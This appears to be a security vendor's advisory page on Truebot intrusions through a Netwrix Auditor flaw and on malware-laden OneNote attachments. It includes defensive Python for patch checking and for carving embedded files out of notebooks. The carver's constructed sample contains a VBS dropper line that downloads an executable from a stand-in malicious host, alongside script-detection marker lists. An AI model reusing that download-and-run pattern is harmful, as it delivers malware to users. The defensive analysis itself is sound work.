Cybersecurity Advisories

AA23-187A: Truebot Malware Infects Networks in U.S. and Canada

CISA, the FBI, MS-ISAC, and CCCS have released a joint cybersecurity advisory on cyber threat actors using newly identified Truebot malware variants against organizations in the United States and Canada. The attacks exploit a critical remote code execution (RCE) vulnerability, CVE-2022-31199 (CVSSv3 score 9.8, Critical), in Netwrix Auditor to deliver Truebot. Threat actors leverage the flaw to gain initial access and then move laterally within the compromised network.

Truebot is a botnet linked to the Russian-speaking Silence cybercrime group and used by TA505 (associated with the FIN11 group) to deploy Clop ransomware on compromised networks; the new variants have been in use since December 2022. Earlier Truebot variants were delivered primarily through malicious phishing email attachments. Recent versions also gain initial access by exploiting CVE-2022-31199, which lets the actors deploy the malware at scale within the compromised environment. Based on the observed Truebot operations, the adversaries' main goal is to steal sensitive information from compromised systems for financial gain.

Truebot is also used alongside other malware. In several incidents, Cobalt Strike was deployed shortly after Truebot executed, for persistence and data exfiltration. In some phishing campaigns, the FlawedGrace RAT was deployed only minutes after Truebot ran. Researchers have also observed Truebot intrusions using a custom data exfiltration tool called "Teleport" to steal information.

A Truebot infection can quickly escalate into a much larger one, spreading through a network much as ransomware does. The change in delivery vector shows that attacks using the malware continue to evolve.

CVE-2022-31199 Delivery Method for Truebot 

SecurIT360 SOC Managed Services     

If you utilize our SOC Managed Services, here are the actions we are taking to help detect this activity:    

MDR Services    

  • We utilize several threat feeds that are updated daily.  
  • In addition to our automatic threat feeds, we have added known indicators of compromise related to this threat into our MDR solution, FortiSIEM.    

EDR Services    

  • In addition to ongoing vendor IoC updates, we have added known indicators of compromise related to this threat into our EDR solutions to help with detection.     

Indicators are provided in the Indicators of Compromise section below for your reference.   

As always, if we detect activity related to these exploits, we will alert you when applicable.    

Please feel free to contact the SOC via email ( or telephone (844-474-1244) if you have any questions or concerns.     


  • All Netwrix Auditor customers are advised to upgrade to version 10.5.10977.0 and ensure that no Netwrix Auditor systems are exposed to the internet. 
  • CISA has posted guidelines and recommends that organizations mandate MFA for all staff and services. 
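As an added example (not from the advisory, the agencies, or Netwrix), the Python below checks the two Netwrix recommendations above: whether an installed Netwrix Auditor build is older than the fixed build 10.5.10977.0, comparing the version numerically rather than as a string, and whether the service's remoting port is reachable from a given vantage point. The fixed build number comes from this page; the port, TCP 9699, is an assumption taken from the public write-ups of CVE-2022-31199, not from this page, and the host name in the usage line is hypothetical.

```python
"""Added example, not part of the advisory: Netwrix Auditor build and exposure check.
Fixed build 10.5.10977.0 is from the page. TCP 9699 as the Netwrix Auditor
remoting port is an assumption from public write-ups of CVE-2022-31199."""
import socket

FIXED_BUILD = "10.5.10977.0"
NETWRIX_REMOTING_PORT = 9699  # assumption, see module docstring


def parse_build(version: str) -> tuple:
    """'10.5.10977.0' -> (10, 5, 10977, 0).

    Numeric comparison matters: compared as strings, '10.5.9999.0' sorts
    *after* '10.5.10977.0' and would wrongly pass as patched."""
    parts = version.strip().split(".")
    if not parts or not all(p.isdigit() for p in parts):
        raise ValueError(f"unparseable version string: {version!r}")
    return tuple(int(p) for p in parts)


def needs_upgrade(installed: str, fixed: str = FIXED_BUILD) -> bool:
    """True when the installed build predates the fixed build."""
    return parse_build(installed) < parse_build(fixed)


def port_reachable(host: str, port: int = NETWRIX_REMOTING_PORT, timeout: float = 3.0) -> bool:
    """Plain TCP connect test. Run it from outside the perimeter (or against
    the public IP) to confirm the remoting port is not internet-exposed."""
    try:
        with socket.create_connection((host, port), timeout=timeout):
            return True
    except OSError:
        return False


if __name__ == "__main__":
    for v in ("10.5.10977.0", "10.5.9999.0", "10.4.0.0", "10.6.0.0"):
        verdict = "upgrade required" if needs_upgrade(v) else "at or above fixed build"
        print(f"{v}: {verdict}")
    # Hypothetical host name; the check itself is a real TCP connect:
    # print(port_reachable("auditor.example.internal"))
```

Run the port check from an external vantage point: a result of True from the internet means the remoting service is exposed and the upgrade plus firewalling should be treated as urgent.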

MITRE Summary 

Initial Access 

  • T1091 – Replication Through Removable Media: Cyber threat actors use removable media drives to deploy Raspberry Robin malware. 
  • T1189 – Drive-by Compromise: Cyber threat actors embed malicious links or attachments within web domains to gain initial access. 
  • T1190 – Exploit Public-Facing Application: Cyber threat actors exploit Netwrix Auditor vulnerability CVE-2022-31199 for initial access, with follow-on lateral movement through remote code execution. 
  • T1566.002 – Phishing: Spearphishing Link: Truebot actors send spearphishing links to gain initial access. 

Execution 

  • T1059 – Command and Scripting Interpreter: Cyber threat actors drop Cobalt Strike beacons as a reverse shell proxy to create persistence within the compromised network. FlawedGrace receives PowerShell commands over a C2 channel to deploy additional tools. 
  • T1129 – Shared Modules: Cyber threat actors deploy malicious payloads through obfuscated shared modules. 
  • T1204.001 – User Execution: Malicious Link: Cyber threat actors trick users into clicking a link by making them believe they need to install a Google Chrome update. 

Persistence 

  • T1574.002 – Hijack Execution Flow: DLL Side-Loading: Cyber threat actors use Raspberry Robin, among other toolsets, to side-load DLLs and maintain persistence. 

Privilege Escalation 

  • T1547.012 – Boot or Logon Autostart Execution: Print Processors: FlawedGrace manipulates print spooler functions to achieve privilege escalation. 

Defense Evasion 

  • T1027 – Obfuscated Files or Information: Truebot stores the GUID it generates for the host in a file with a random name and a .JSONIP extension (e.g., IgtyXEQuCEvAM.JSONIP). 
  • T1027.001 – Obfuscated Files or Information: Binary Padding: Cyber threat actors embed around one gigabyte of junk code in the malware binary to evade detection. 
  • T1036.008 – Masquerading: Masquerade File Type: Cyber threat actors disguise Truebot as legitimate-looking file formats. 
  • T1055 – Process Injection: Truebot can load shellcode after establishing a C2 connection. 
  • T1070.004 – Indicator Removal: File Deletion: Truebot deletes itself at stages of its attack cycle to evade detection. Teleport deletes itself after it has finished exfiltrating data to the C2 server. 
  • T1112 – Modify Registry: FlawedGrace modifies registry entries that control the order in which documents are loaded into a print queue. 
  • T1620 – Reflective Code Loading: Truebot can load shellcode and deploy various tools to navigate an infected network stealthily. 

Credential Access 

  • T1003.001 – OS Credential Dumping: LSASS Memory: Cyber threat actors use Cobalt Strike to obtain valid credentials by dumping LSASS memory. 

Discovery 

  • T1016 – System Network Configuration Discovery: Truebot enumerates the affected system's domain names. 
  • T1057 – Process Discovery: Truebot enumerates all running processes on the local host. 
  • T1082 – System Information Discovery: Truebot enumerates the OS version, processor architecture, and computer name of the affected system. 
  • T1124 – System Time Discovery: Truebot reads the system time, which lets it synchronize with the compromised host's clock when scheduling tasks. 
  • T1518.001 – Software Discovery: Security Software Discovery: Truebot enumerates installed security software, which aids in defense evasion. 
  • T1622 – Debugger Evasion: Truebot scans the compromised host for debugger tools and enumerates them in an effort to evade analysis and defenses. 

Lateral Movement 

  • T1210 – Exploitation of Remote Services: Cyber threat actors exploit the Netwrix Auditor vulnerability CVE-2022-31199 and use its remote code execution to move laterally within a compromised network. 
  • T1550.002 – Use Alternate Authentication Material: Pass the Hash: Cyber threat actors use Cobalt Strike to authenticate as valid accounts with stolen password hashes. 
  • T1563 – Remote Service Session Hijacking: Cyber threat actors use Cobalt Strike to hijack remote sessions through SSH and RDP hijacking methods. 
  • T1563.002 – Remote Service Session Hijacking: RDP Hijacking: Cyber threat actors use Cobalt Strike to hijack existing RDP sessions. 
  • T1570 – Lateral Tool Transfer: Cyber threat actors deploy additional payloads to transfer toolsets between hosts and move laterally. 

Collection 

  • T1005 – Data from Local System: Truebot checks the OS version and processor architecture and compiles the collected information. 
  • T1113 – Screen Capture: Truebot takes snapshots of the local host and sends them, together with the host data it collects (processor architecture, host and domain names), to the C2 as an encoded second-stage string. 

Command and Control 

  • T1071 – Application Layer Protocol: Cyber threat actors use the Teleport exfiltration tool to blend exfiltrated data with normal network traffic. 
  • T1095 – Non-Application Layer Protocol: Cyber threat actors use Teleport and FlawedGrace to send data over a custom communication protocol. 
  • T1105 – Ingress Tool Transfer: Cyber threat actors bring additional tool payloads into the environment to move laterally and establish C2 connections. 
  • T1573.002 – Encrypted Channel: Asymmetric Cryptography: Cyber threat actors use Teleport to create an encrypted channel using AES. (AES itself is a symmetric cipher; the mapping to the asymmetric sub-technique is taken from the joint advisory.) 

Exfiltration 

  • T1029 – Scheduled Transfer: Teleport limits the data it collects and syncs its transfers with outbound organizational network traffic. 
  • T1030 – Data Transfer Size Limits: Teleport limits the size of the data it collects and transfers so that it blends with outbound organizational traffic. 
  • T1041 – Exfiltration Over C2 Channel: Cyber threat actors use Teleport to exfiltrate data over the C2 protocol, blending the exfiltrated data with network traffic to evade detection. 

Indicators of Compromise 

Resources & Related Articles 


Hackers Use Microsoft OneNote Attachments to Spread Malware


Malicious actors are using a file format new to this role, Microsoft OneNote attachments, to spread malware to targets. Because OneNote lets users insert attachments into a notebook, threat actors abuse the feature by embedding malicious VBS attachments that, when double-clicked, run a script that downloads malware from a remote site and installs it. Since an inserted attachment appears as a file icon in OneNote, the actors overlay a large 'Double click to view file' bar over the VBS attachments to hide them. Moving the 'Click to View Document' bar aside reveals that the notebook contains multiple copies of the attachment, arranged so that a double-click anywhere on the bar lands its second click on an attachment and launches the malware. 

OneNote does display a warning before running an embedded attachment. If the victim ignores the warning and clicks OK, however, the VBS script runs, downloads the malware and installs it, giving the threat actor remote access to the device to steal files and saved browser passwords, take screenshots, and in some cases record video from the webcam.  
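As an added example (not from the advisory, from Microsoft, or from any vendor), the Python below carves the embedded files out of a OneNote .one attachment and classifies them, so a suspect attachment can be triaged without opening it in OneNote. The carving relies on the FileDataStoreObject layout from Microsoft's MS-ONESTORE specification: a 16-byte GUID header {BDE316E7-2665-4511-A4C4-8D4D0B7A9EAC}, an 8-byte little-endian length, then 12 bytes of unused and reserved fields before the file data. The sample notebook, the marker strings and the URL inside the sample script are constructed for the demonstration and are not indicators from this page.

```python
"""Added example, not part of the advisory: carve and classify files embedded in a
OneNote .one attachment. Layout per MS-ONESTORE FileDataStoreObject; the sample
notebook below is constructed, not a real lure."""
import struct
import uuid

FILE_DATA_STORE_GUID = uuid.UUID("{BDE316E7-2665-4511-A4C4-8D4D0B7A9EAC}").bytes_le
HEADER_LEN = 16 + 8 + 4 + 8  # guidHeader, cbLength, unused, reserved

# Scripts are matched on their text, binaries on their magic bytes (constructed lists).
SUSPICIOUS_MARKERS = {
    "vbs": (b"CreateObject(", b"WScript.Shell", b"XMLHTTP"),
    "hta": (b"<hta:application", b"<script"),
    "powershell": (b"powershell", b"Invoke-Expression", b"IEX "),
    "batch": (b"@echo off", b"cmd /c", b"cmd.exe"),
}
MAGIC = {b"MZ": "pe-executable", b"\x7fELF": "elf", b"PK\x03\x04": "zip-or-office"}


def extract_embedded_files(one_bytes: bytes) -> list:
    """Return the raw payload of every FileDataStoreObject found in the notebook."""
    payloads, pos = [], 0
    while True:
        pos = one_bytes.find(FILE_DATA_STORE_GUID, pos)
        if pos < 0 or pos + HEADER_LEN > len(one_bytes):
            return payloads
        (length,) = struct.unpack_from("<Q", one_bytes, pos + 16)
        start = pos + HEADER_LEN
        if length > len(one_bytes) - start:  # truncated or malformed object
            return payloads
        payloads.append(one_bytes[start:start + length])
        pos = start + length


def classify(payload: bytes) -> str:
    """Coarse verdict: executable or script kinds the OneNote lures drop, else 'other'."""
    for magic, kind in MAGIC.items():
        if payload.startswith(magic):
            return kind
    lowered = payload.lower()
    for kind, markers in SUSPICIOUS_MARKERS.items():
        if any(m.lower() in lowered for m in markers):
            return kind
    return "other"


def triage(one_bytes: bytes) -> list:
    """[(index, kind, size)] for every embedded file; anything not 'other' deserves a look."""
    return [(i, classify(p), len(p)) for i, p in enumerate(extract_embedded_files(one_bytes))]


def fds_object(data: bytes) -> bytes:
    """Build one FileDataStoreObject around data (footer GUID omitted; carving stops at cbLength)."""
    return FILE_DATA_STORE_GUID + struct.pack("<Q", len(data)) + b"\x00" * 12 + data


# Constructed sample: filler standing in for the file header and page structures (ignored
# by the carver), a benign PNG stub, and a dropper-style VBS repeated three times, as the
# lure described above stacks copies under one 'Double click to view file' bar.
VBS = (b'Set o = CreateObject("MSXML2.XMLHTTP")\r\n'
       b'o.Open "GET", "http://malware.example/stage2.exe", False\r\n'
       b'o.Send\r\nSet s = CreateObject("WScript.Shell")\r\n')
PNG_STUB = b"\x89PNG\r\n\x1a\n" + b"\x00" * 32
SAMPLE_NOTEBOOK = b"\x00" * 64 + fds_object(PNG_STUB) + fds_object(VBS) * 3 + b"\x00" * 16


if __name__ == "__main__":
    for index, kind, size in triage(SAMPLE_NOTEBOOK):
        print(f"embedded file {index}: {kind} ({size} bytes)")
```

Three script payloads in a notebook that renders as one "click to view" button is exactly the stacking the lure uses; the carver does not recover the attachment's display name, so feed any non-"other" payload to the sandbox or AV rather than relying on what the icon claims to be.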

Fake DHL Email with OneNote Attachment 

Malicious OneNote Email Attachment

SecurIT360 SOC Managed Services 

If you utilize our SOC Managed Services, here are the actions we are taking to help detect this activity:  

MDR Services 

  • We have added indicators related to known malicious threat actors into our blocklists in our MDR solution, FortiSIEM.  
  • Indicators are provided in the Indicators of Compromise section below if you would like to proactively block them in your firewall.  

EDR Services 

  • In addition to ongoing vendor IoC updates, we have added known indicators of compromise related to this threat into our EDR solutions to help with detection.   

As always, if we detect activity related to these exploits, we will alert you when applicable.  


  • The best way to protect against malicious attachments is to simply not open files from people you do not know. If a file is mistakenly opened, do not disregard the warnings displayed by the operating system or application.  
  • If you see a warning that opening an attachment or link could harm your computer or files, simply do not press OK and close the application.  
  • If you feel it may be a legitimate email, share it with a security or Windows admin to help you verify if the file is safe.  
  • Consider blocking “.one” attachments. See: 
  • OneNote users are recommended to enable multi-factor authentication, use antivirus protection, and follow the best security practices for preventing phishing attacks.    


SOC Prime has released rules to detect cyber attacks abusing OneNote attachments; see SOC Prime's published detection content for the full list.  

MITRE Summary 

  • TA0002 – Execution 
  • T1047 – Windows Management Instrumentation  
  • TA0005 – Defense Evasion  
  • T1027 – Obfuscated Files or Information  
  • T1036 – Masquerading  
  • T1070.006 – Timestomp 
  • T1497 – Virtualization/Sandbox Evasion 
  • T1562.001 – Disable or Modify Tools  
  • TA0006 – Credential Access  
  • T1003 – OS Credential Dumping  
  • TA0007 – Discovery 
  • T1057 – Process Discovery  
  • T1082 – System Information Discovery  
  • T1012 – Query Registry  
  • T1016 – System Network Configuration Discovery  
  • T1083 – File and Directory Discovery  
  • TA0009 – Collection 
  • T1005 – Data from Local System  
  • TA0011 – Command and Control  
  • T1071 – Application Layer Protocol  

Indicators of Compromise (IoCs) 

Resources & Related Articles